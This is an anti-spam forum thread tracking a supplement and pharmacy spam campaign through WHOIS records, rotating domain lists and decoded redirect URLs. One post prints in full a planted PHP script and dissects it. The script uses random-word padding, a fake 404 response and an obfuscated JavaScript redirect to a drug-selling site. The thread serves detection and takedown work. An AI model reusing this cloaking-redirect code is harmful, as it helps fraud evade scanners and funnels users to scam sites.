Status: clientUpdateProhibited https://www.icann.org/epp#clientUpdateProhibited
Updated Date: 25-jan-2016
Creation Date: 25-jan-2016
Expiration Date: 25-jan-2017
..
Registrant Name: DOMAIN MAY BE FOR SALE, CHECK AFTERNIC.COM Domain Admin
Registrant Organization: Domain Registries Foundation
Registrant Street: Ramon Arias Avenue, Ropardi Building,
Registrant Street: Office 3C, PO Box 0823-03015
Registrant City: Panama City
Registrant State/Province: Panama
Registrant Postal Code: 0823
Registrant Country: PA
Registrant Phone: +507.8365439
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: admin@domainregistriesfoundation.com

The web site has a holding pattern. That may change soon, but currently it is not so impressive.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Feb 19, 2016 11:45 pm

Hi SIL

I thought it would be possible to simply insert the domain name into the decrypted URL to go to the Safflower site.

Example, zolkm.com would become
http://404-health.zolkm.com/enkogc/everyday/r-cla-safflower-oil/

For a whie that was working, but now it lands on the Save the Children site again. Has the decryption changed?

Maybe it is now using the forskolin option. Here is one that worked for me

http://479-healthandbeauty.atezt.com/enbsmd/everyday/we-pure-natural-forskolin/
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Sat Feb 20, 2016 2:39 am

These are the 3 current URLS derived from your bnoshop.com/might.php - they are selected randomly -

Code: Select all
url=http://brfvy.com/?a=370951&c=uwl&s=03BAM
url=http://mjooex.com/?a=370951&c=uwl&s=03BAM
url=http://oxndds.com/?a=370951&c=uwl&s=03BAM


In short,
Code: Select all
brfvy.com
mjooex.com
oxndds.com


I would appreciate any more examples like bnoshop if you see them in your spam traps.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby spamislame » Tue Feb 23, 2016 4:12 pm

Red Dwarf wrote:For a whie that was working, but now it lands on the Save the Children site again. Has the decryption changed?

I'd need to see a sample. None of my sources receive this spam lately. :)

Also, to the spammer moron devs who must be reading this thread: Hi. Your obfuscation sucks.

Red Dwarf wrote:Maybe it is now using the forskolin option. Here is one that worked for me

http://479-healthandbeauty.atezt.com/enbsmd/everyday/we-pure-natural-forskolin/

Sure. They semi-randomize the prefixes to these domains. All based on a random selection of terms which are placed before the main url.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby spamislame » Tue Feb 23, 2016 5:03 pm

Another update.

Here's what one of their php files look like (apologies, I had to hard-wrap it to make it legible here.):

Code: Select all
<?php
function html($data)
{
$html=implode("\r\n",array("%1html%3","%1head%3",head(),"%2head%3","%1body%3%sig
n%",body($data),"%2body%3","%2html%3"));
$html=preg_replace('/%1/',"<",$html);$html=preg_replace('/%2/',"</",$html);$html
=preg_replace('/%3/',">",$html);
$sign=parag(1,1).(strlen($html)+31331);$html=preg_replace('/%sign%/',$sign,$html
);
return $html;
}
function body($data)
{
srand(seed());
$body=array();
for($i=0;$i<rand(3,10);$i++)
{
$text=parag(50,250);
srand(seed());
$tags=array("p","div","span");$tags=$tags[rand(0,count($tags)-1)];
array_push($body,"%1$tags%3",$text,"%2$tags%3");
}
array_push($body,js($data));
return implode("\r\n",$body);
}
function head()
{
srand(seed());
$title=parag(2,10);
$charset=array("ISO-8859-1","UTF-8");$charset=$charset[rand(0,count($charset)-1)
];
$headers=array("%1style type=\"text/css\"%3\r\nbody { background:#ffffff;
color:#ffffff; }\r\n%2style%3","%1title%3$title%2title%3","%1meta
http-equiv=\"Content-Type\" content=\"text/html; charset=$charset\"%3");
srand(seed());
$rnd_num=rand(0,1);
if($rnd_num)
{
$description=parag(4,10);
$keywords=array();for($i=0;$i<rand(1,10);$i++){array_push($keywords,parag(1,1));
} $keywords=implode(", ",$keywords);
srand(seed());
$additional=array("%1meta name=\"description\"
content=\"$description\"%3","%1meta name=\"keywords\"
content=\"$keywords\"%3");$additional=$additional[rand(0,count($additional)-1)];
array_push($headers,$additional);
}
shuffle($headers);
return implode("\r\n",$headers);
}
function js($data)
{
array_unshift($data,119,105,110,100,111,119,46,116,111,112,46,108,111,99,97,116,
105,111,110,46,104,114,101,102,61,39);array_push($data,39,59);
srand(seed());$diff=rand(1,100);$name=parag(1,1);
$code="%1script type=\"text/javascript\"%3\r\n";
$code.="function ".$name."e() { ";
$code.=$name."a=$diff; ".$name."b=[";
$list=array();foreach($data as $byte){array_push($list,($byte+$diff));}
$code.=implode(',',$list);
$code.="]; ";
$code.=$name."c=\"\"; for(";
$code.=$name."d=0;".$name."d<".$name."b.length;".$name."d++) { ";
$code.=$name."c+=String.fromCharCode(".$name."b[".$name."d]-".$name."a); }
return ";
$code.=$name."c; } ";
$diff+=1234;$code.="setTimeout(".$name."e(),$diff);\r\n";
$code.="%2script%3";
return $code;
}
function parag($min,$max)
{
srand(seed());
$parag="";
$words=array("theres","such","a","place","as","yarrow","thou","whose","fancies",
"from","afar","are","brought","little","flowerill","make","stir","when","all","a
live","with","merry","chimes","has","it","in","her","power","again","and","fortu
ne","gifts","lies","garland","of","seven","lilies","wrought","should","life","be
","dull","spirits","low","that","they","wanton","wooers","but","we","will","leav
e","growing","years","to","mother","bring","distress","prophet","delight","mirth
","inhale","deeply","right","until","level","the","dust","noble","horde","preser
ve","for","thee","by","individual","water","you","can","start","he","was","free"
,"write","on","snow","yet","left","conquered","mountain","peaks","this","is","ca
lm","there","cannot","stayed","pushkin","never","tried","flee","together","plung
d","into","deep","legs","move","not","if","set","signboard","blaze","weakstraigh
t","grave","well","wander","scotland","thorough","strikes","solitary","sound","w
hat","evil","spirit","deception","my","opponent","played","knows","guess","just"
,"lapped","icecold","milky","way","killing","i","have","made","myself","perhaps"
,"quick","eager","visitings","nor","quit","thy","shore","conspicuous","object","
nations","eye","watched","me","rise","awe","neighborlowlifes","shared","while","
pattern","knights","dance","under","jedborough","tower","screams","weak","allow"
,"pass","cheers","melancholy","mate","let","beeves","homebred","kine","partake",
"twas","face","did","know","stood","against","were","sieving","grain","ossian","
last","his","race","telling","now","worldly","grandeur","despise","woman","road"
,"met","one","chance","look","turn","taken","praise","thine","any","burden","sou
l","pain","keep","squatting","till","drop","darling","passion","approve","slippe
d","cliff","better","memory","punish","him","constant","checking","selfsacrifice
","cover","leaves","children","forlorn","estate","maytime","chearful","dawn","qu
een","greater","than","rest","recollect","doomd","jostle","unkindly","shocks","s
quares","more","like","circles","eyes","sea","grief","splashing","diffusion","cr
own","win","stirring","brake","fern","time","before","thrush","ever","deeds","gi
ve","birth","bay","quiet","or","unthoughtof","obscurity","sad","sight","shepherd
","sigh","shake","flowing","rivers","would","hide","she","wait","return","pity",
"whom","must","follow","head","fall","starting","duel","so","inane","brothers","
reachd","gateway","who","art","light","guide","rod","something","deeper","far","
these","neither","shape","danger","dismay","lanes","thoughts","pursuing","good",
"men","do","sate","denial","restraint","prize","how","nourishd","here","through"
,"long","ground","thankfulness","halts","searches","smitten","heart","god","only
","known","some","might","say","run","cry","nay","us","die","oh","strong","force
ful","echo","voice","enwrought","tempted","able","endure","speak","horn","shall"
,"witness","pasture","expending","vegetarian","love","sweet","highland","girl","
part","an","indian","approach","every","angle","sought","moral","creed","deaf","
drooping","doom","hangover","quickening","thence","also","tenderness","influence
","peculiar","grace","risen","out","many","nownow","along","gap","where","edge",
"very","narrow","been","then","thought","joy","wants","eatand","eat","beg","plea
se","your","quite","advanced","died","cabin","small","betwixt","living","dead","
oer","lauras","over","hill","hollow","evolve","havoc","disease","risk","land","s
ped","horse","away","wounded","game","workman","worthy","sainted","bold","hubert
","lives","glee","scramble","cities","crowded","streets","apprehensions","come",
"crowds","dweller","savage","ends","maintain","rights","those","rules","saw","up
on","nearer","view","said","beneath","cloak","separation","music","bore","beauti
ful","verses","their","honor","penned","ages","heirs","value","masters","side","
murmur","near","silent","lake","yarrows","banks","herons","feed","towards","peop
le","era","grew","colder","night","day","at","even","morn","brain","wisdom","gre
edy","spider","flower","mine","check","erring","reprove","alas","received","chee
rless","murky","space","depleting","gloomily","gleaming","harking","talking","ma
n","arms","wish","thing","unreconciled","pious","bird","scarlet","breast","bluec
ap","colours","bright","ye","thoughtless","pair","old","unhappy","faroff","thing
s","above","human","estimate","crawling","lurking","concealing","others","spille
d","blood","moment","stay","brink","paris","france","disapproved","sharing","see
","hamiltons","ballad","took","jacket","off","effect","no","babe","proposed","ca
stle","trade","board","prove","best","heights","boughs","them","closing","comman
dment","kill","vain","causeless","led","lucy","spot","continued","rue","posterng
ate","slunk","sun","shade","annoying","crickets","voluptuously","luscious","gods
","appointment","sway","heave","after","our","first","green","pastures","remain"
,"which","nothing","sweeter","heard","hungered","fame","accused","gaiety","coura
geous","shows","its","hunting","sinful","demand","roaring","yelling","peace","di
sturbing","contracted","own","hurried","ran","called","though","past","prime","f
eeling","renderd","compassionate","grip","pistol","hand","go","spots","bough","g
rassy","blade","sweat","tenseness","wedding","down","rocks","leap","plaintive","
numbers","flow","lost","weight","slept","fine","gradually","vanishing","century"
,"lasting","slowly","passed","strike","take","aim","famous","robin","hood","inde
ed","claim","principles","amen","poor","yurik","steph","empty","terrors","overaw
e","sweets","burnmill","meadow","convent","hermits","cell","wooden","castles","r
ooks","bar","closed","months","went","smilingly","repeats","moan","moss","stone"
,"incapable","vengeance","refuse","lineswithout","doubt","poet","play","awesome"
,"appetite","works","three","four","smiles","motion","sky","serene","pure","almo
st","could","repine","hadst","boast","didst","foot","had","useless","trunk","var
ious","poems","scene","laid","buds","taught","piece","route","falsely","correctl
y","single","passd","sir","eustace","present","does","bard","sleep","dilemma","a
ppeared","warn","comfort","command","countless","warriors","pale","trembling","d
enmark","cast","exceeding","pleasure","among","farthest","hebrides","spite","rea
son","thoughtful","herdsman","strays","stately","passions","burn","fought","luci
es","fair","hangs","apple","frae","rock","second","twilight","looks","gay","alth
ough","wild","moor","wood","fairest","creatures","desire","increase","wind","thr
ew","words","pleasance","transports","advantage","jab","playmates","sunny","weat
her","swap","each","figure","liquor","glass","why","am","ignorant","same","awaki
ng","sleeping","marching","parading","most","important","true","solitude","binno
rie","lie","about","feet","moving","back","forth","hath","family","outlaw","dari
ng","mood","egremonts","domains","death","emerges","done","worldlings","unmovd",
"mind","lanetheres","morning","rub","yourself","harder","two","simple","phrases"
,"unfinished","scenes","need","child","eddying","round","sink","flew","during","
term","hear","neglect","lower","world","descending","bravery","times","conclusio
n","drawn","raw","wet","stirs","doors","brother","seems","singingbird","gone","p
icture","wellspent","seemd","paltry","indopakistani","struggle","highranking","a
dolescents","worse","ourselves","walk","started","perceive","duller","none","tra
cks","motions","slow","knowing","think","lofty","woke","forgive","tough","become
","favour","sounded","alone","enormous","barrier","binds","fast","find","longs",
"get","trapped","fishermen","net","large","droplets","flowers","laugh","beds","h
igher","hast","summoned","melt","pointed","lance","travel","hours","perfect","gl
adsomeness","rage","rush","around","house","pother","young","lambs","fullgrown",
"flocks","beside","heathy","dell","close","behind","frosty","air","fishers","sis
ters","johnny","warned","watch","foresee","moves","surely","surrender","quality"
,"act","tales","whybecause","rule","steep","up","kind","chaunt","passing","stave
","capable","rate","strange","slight","scorn","fear","clear","weeds","law","depe
nds","port","plane","april","still","asking","deceitful","solution","chime","fan
cy","wrong","trod","clyde","tay","skies","stream","flows","bonny","holms","maimd
","mangled","inhuman","often","sighd","measure","summers","heat","winters","trav
eller","whole","summer","fields","peers","whats","arm","bear","vision","sovereig
n","enact","winsome","marrow","tell","everything","closer","fellowship","count",
"glittering","countenance","moved","expressd","lines","yes","endless","problem",
"answer","seemed","strife","despair","glorious","ministry","thats","moon","choic
e","blurry","meat","bullets","easy","chewable","food","comprehends","trust","rem
nant","uneasy","crystal","flakes","brilliant","glow","wave","fare","talented","h
ymns","sings","springtime","cuckoobird","oft","nooks","remote","brave","rob","ro
y","impossible","doth","won","found","hopeless","honour","gain","creature","lord
","friend","tackle","becoming","irate","gentle","nature","guard","ill","flaring"
,"unusual","primroses","glory","branches","quietly","squealing","joyous","other"
,"stuff","age","twine","brows","fresh","spring","brings","decay","hell","else","
bawling","raving","signing","flirting","july","suns","feels","games","giddy","sp
rite","darkness","pleasd","equal","lay","sights","rough","sounds","rains","comes
","sparkle","cheek","agile","neat","pansies","kingcups","daisies","desperately",
"try","shot","caught","utmost","bounty","kindle","fire","new","stirrd","too","se
date","outward","show","kings","aces","disguise","lonely","deem","unmeet","news"
,"sleeps","glen","without","someone","attacked","pretty","kitten","freaks","leaf
","glowworm","quickly","may","float","double","swan","shadow","daunted","father"
,"recompence","catch","lips","mazy","unravelld","really","roam","abides","resolv
e","stops","lookd","wanting","once","fish","raves","thus","daily","selfsurpast",
"going","hence","livst","less","ambitious","sprint","fly","crags","repeat","rave
ns","croak","bliss","number","funny","droll","repeating","timid","coming","whenc
e","kindly","unassuming","cheer","wings","arch","wily","ways","lead","generous",
"books","course","call","household","fitted","needs","lovely","apparition","sent
","hook","jaw","early","breath","tigerleap","half","late","conceived","proper","
curse","lacked","fully","methods","attack","mad","throughout","conflict","keeps"
,"forward","persevering","gallop","horses","peaceful","bed","because","museand",
"agree","shoved","unwelcome","tasks","word","fulfilld","singing","hearts","insan
e","happened","surgeon","cut","across","thither","rainbow","cloud","figurethere"
,"year","dost","confession","askd","forgiveness","fellow","feats","vainly","spre
ads","lure","inheritest","lions","den","endurance","foresight","strength","skill
","hid","care","thousand","standersby","evermore","beguild","whether","blows","w
estern","bound","himself","unbound","ownd","precipice","front","begin","fro","hu
rry","fight","rover","suddenly","agreed","draw","shone","tree","observed","blund
er","enough","earth","heaven","imagery","lowlier","gains","rewards","privileges"
,"loch","ketterine","evening","sunset","mien","blending","pawn","standing","prou
d","country","bred","adopt","homely","dress","within","bud","buriest","content",
"glitters","plain","pinfoldlike","burialgrounds","neglected","desolate","showers
","manna","breaking","defense","told","simply","fidelity","dog","hovering","nigh
","hospitably","entertained","weeks","dismal","guarding","protecting","meet","pl
easant","build","sides","wishes","carst","naught","longest","appetizer","use","b
ottle","sign","fallen","faculties","english","balladsingers","transient","sorrow
s","wiles","tender","heir","flight","surrounded","ancient","heavens","writing","
rhymes","england","hawk","prey","maiden","dwelling","yon","lass","yelping","runs
","symphony","austere","hed","today","disgrace","unwind","drink","sing","blast",
"utterd","unskillfulness","aid","aside","smoke","image","outlined","hang","remem
berd","blest","got","fastidious","coronet","riding","home","stormy","louisa","le
ts","bad","receives","fiercely","hunters","line","lightweight","bishops","feeble
","forms","covert","peep","travellers","shady","haunt","askest","stared","blink"
,"came","clovenford","few","meagre","vales","confind","joys","spy","bosom","helv
ellyn","rocky","supplicate","controul","travelld","unknown","exposd","suffering"
,"furnishes","suspended","defeat","hanging","tail","step","frost","shew","help",
"frame","listen","tight","thong","later","learned","panic","winds","brook","sits
","vacant","shots","being","fired","aims","grass","forgivn","guards","feel","res
tless","loudly","grunting","running","painted","robins","breathed","burthen","fa
shiond","dream","knew","matron","due","blasts","wit","towel","spotted","fruit","
unripe","industrious","folly","patient","primrose","fault","dusk","ive","seldom"
,"markd","press","likewise","sons","daughters","dig","inside","plate","throat","
walked","throne","deserved","missing","link","glides","dark","hills","nest","cri
ed","loves","friends","trim","hues","filld","tears","whateer","enjoyments","dwel
l","ripening","innocence","example","gave","looking","snack","records","promises
","submit","bowers","playd","gambol","lifes","falling","state","youth","pathway"
,"cultivated","heaved","holding","lover","craved","quell","foes","unfolding","wi
de","earthly","cares","asleep","pyramid","celandine","bag","lose","shout","whist
le","ear","bitterness","quietness","thickets","fifty","greetings","stirringly","
swimming","walking","repose","twice","consenting","shed","glance","eagerness","c
hasing","mice","health","body","pind","theme","sung","another","grizzly","speech
","bit","makes","decoy","chased","harnesses","high","darts","blame","wildest","s
cream","ah","already","spent","pride","gazed","conveyd","wealthy","treasure","dr
ead","rustling","utterly","guise","kept","voyages","delights","mournful","tale",
"keen","white","great","issues","humankind","spare","conflicts","fate","unaware"
,"astronomer","break","silence","throw","needful","knight","verse","steerd","pro
clamationhorn","mock","apparel","son","humbled","sit","walls","truth","seem","an
swerd","soon","question","appearance","meets","sang","battles","soccer","player"
,"tarn","below","wrongs","scarcely","heed","blocked","lane","faery","voyager","b
oth","wise","crush","rival","howsoever","mean","derived","search","starsigntauru
s","grasped","immobility","lithest","gaudiest","harlequin","kisses","touch","sip
","separating","opposing","notion","proved","booze","coffee","charms","seas","th
read","ariadne","scheme","chef","convinced","scared","steps","virgin","liberty",
"days","following","husband","govern","record","honest","continuing","imprisond"
,"hot","sunshine","inheritance","twilights","dusky","hair","whatsoeer","sunbrigh
t","full","childish","liveth","despaird","believd","remains","wearily","length",
"flaw","unknowingly","missed","stirrups","disciplined","wicked","sickle","bendin
g","stop","matter","learn","history","bleak","mild","concerns","ordinary","winte
r","wears","proof","roys","alert","planned","plotted","fierce","row","dauntless"
,"challenge","ask","apply","beauty","dower","woe","lintwhites","chorus","fellowt
raveller","cold","ice","worlds","flu","illnessthree","region","lucky","bastard",
"twill","soothe","sorrow","polity","sacrifice","christ","saviour","sticking","ke
rchiefplots","mold","name","river","bare","wanderers","thousands","dollars","eff
ortless","money","fatherly","concern","pang","vexd","aver","multitude","sweetly"
,"reposing","bands","armsout","trees","veil","withdrawn","hut","tour","confuse",
"debut","godheads","benignant","andmoney","needed","ride","barking","cat","plays
","neatly","error","unprofitable","ophilia","dear","delighted","sake","replaced"
,"athletic","prophy","guessing","tundra","peter","norway","boors","prison","clin
icmy","seemliness","complete","sways","seen","tiviot","dale","familiar","provoke
s","lady","shares","wonder","merits","resolved","eer","champion","brotherhood","
venerable","damn","fawns","extacy","buttercups","unheard","cull","faculty","stor
m","turbulence","happy","genial","barely","cool","diffuse","blessd","main","emba
rrassd","shy","next","sense","persons","advance","hamilton","beginning","shield"
,"latest","impearling","lucie","born","figures","braes","humbly","bloodshed","mi
serable","train","courtesies","wilt","panting","violets","acted","tidings","woes
","end","stars","hungry","surprised","tells","clamor","stopped","dries","used","
severe","since","untowardness","poets","mere","mostly","rooted","chair","livd","
lands","soothed","milder","airs","stranger","seemingly","civil","harmless","stan
d","straight","nervous","daisy","blessed","rising","collapse","reaping","herself
","remember","amazing","palms","infants","laughing","puzzled","blinded","immedia
tely","leaps","feeding","appletree","superstition","worth","taking","sympathy","
heeds","trace","upstarting","affright","greetst","fowls","ref","hadn","opened","
score","nobody","posterity","renownd","unexciting","vice","guests","listend","fi
ll","reaper","bushes","mournfully","eggs","gaze","places","hurrythree","flourish
","seeking","school","scannd","dewdrop","unto","lowly","pursue","pox","turns","n
ecessity","beloved","possess","grotto","particular","exquisite","baby","chains",
"tie","befal","yellow","rouzd","vale","holiday","flutterd","perchd","thank","mec
hanic","whip","lash","striking","force","applying","muscles","shaped","wake","hi
ghlands","troubles","beyond","relief","untimely","joyousness","hideandseek","hom
efelt","pleasures","itself","common","breeds","liked","greeting","mountains","ea
gle","seventythree","nighttime","short","hither","straightway","behold","seehis"
,"fork","begins","rattle","boat","graven","read","fathers","courtesy","runaway",
"beautifully","outstandingly","clever","prettiest","tumbler","infant");
if($min==1)
{
return $words[array_rand($words)];
}
else
{
$words_idx=array_rand($words,rand($min,$max));
$first_upc=1;
$parag=array();
foreach($words_idx as $idx)
{
$word=$words[$idx];
$rnd_num=rand(0,1);
$sym="";
if($rnd_num)
{
$rnd_sym=array(","," -",":",".");
$rnd_num=rand(0,count($rnd_sym)-1);
$sym=$rnd_sym[$rnd_num];
$word.=$sym;
}
if($first_upc)
{
array_push($parag,ucfirst($word));
$first_upc=0;
}
else
{
array_push($parag,$word);
}
if($sym=="." || $sym==":") $first_upc=1;
}
array_push($parag,$words[array_rand($words)]);
}
return implode(" ",$parag).".";
}
function seed()
{
list($usec,$sec)=explode(' ',microtime());
return(float)$sec+((float)$usec*100000);
}
header("HTTP/1.1 404 Not
Found");echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,
114,117,103,115,118,97,108,117,101,46,114,117)));
?>


That last bit is the payload:

Code: Select all
echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,
114,117,103,115,118,97,108,117,101,46,114,117)));


Really they put all of that code in there to completely randomize the output. That array of single words is used throughout. Every parameter used by the resulting javascript derives its name from that random word list. But that final line is really just the "charcode" values of the target url.

104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,114,117,103,115,118,97,108,117,101,46,114,117

Translated to:

http://perfectdrugsvalue.ru

The files are placed on the server via automated means, so whichever process is doing this does so with a seeded final destination url that it turns into these charcodes, and then generates this php file. Every php file has its own custom set of random words.

Also note the 404 response just prior to output:

Code: Select all
header("HTTP/1.1 404 Not
Found");echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,
114,117,103,115,118,97,108,117,101,46,114,117)));

What that's saying is:

By default, output a 404 not found response, and then run the "html" function feeding it the charcodes of the destination url.

If you try to wget or curl the url: you get the 404. Same for any other means of deriving the url via alternate methods besides direct browsing. Otherwise it ultimately outputs a redirect to the target url.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Wed Feb 24, 2016 5:25 pm

Red Dwarf wrote:These are the 3 current URLS derived from your bnoshop.com/might.php - they are selected randomly -

Code: Select all
url=http://brfvy.com/?a=370951&c=uwl&s=03BAM
url=http://mjooex.com/?a=370951&c=uwl&s=03BAM
url=http://oxndds.com/?a=370951&c=uwl&s=03BAM


In short,
Code: Select all
brfvy.com
mjooex.com
oxndds.com


I would appreciate any more examples like bnoshop if you see them in your spam traps.


Those domain names have been abandoned and replaced with
Code: Select all
http://rpfxf.com/?a=370951&c=uwl&s=03BAM
http://oisrii.com/?a=370951&c=uwl&s=03BAM
http://tyikl.com/?a=370951&c=uwl&s=03BAM


In short:
Code: Select all
rpfxf.com
tyikl.com
oisrii.com


Sponsors:
Code: Select all
 rpfxf.com   Registrar: BIZCN.COM, INC.
 tyikl.com   Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 oisrii.com   Registrar: ONLINENIC, INC.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Thu Feb 25, 2016 9:48 pm

New skin, same fraud, Forskolin today:

Code: Select all
uskldl.com
xybdyj.com
bbikiy.com


Sponsors are OnlineNIC, BIZCN, BIZCN respectively

Featuring: Gwen Stefani Shares Blake Shelton's Secret To Rapid Weight Loss (Pics Below)

Typical URL derived:
360-fitness.uskldl.com/enumbr/tmz/we-pure-natural-forskolin/
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Mar 18, 2016 7:22 pm

Is there a new redirection format that is working, or is the whole Safflower / Forskolin scam on the fry?

I am wondering if the gateway error is just a subterfuge, and somewhere out ther a new redirection process is working undetected by me.

(They still get shut down, working or not.) :silthumb:
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby spamislame » Mon Apr 04, 2016 10:22 am

Howdy

I do not know. If you receive fresh spam containing such a url please pm me the url and I'll do some more digging.

They're definitely staying far away from me. :)

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am


Return to Fight Spammers

Who is online

Users browsing this forum: Ahrefs and 1 guest

cron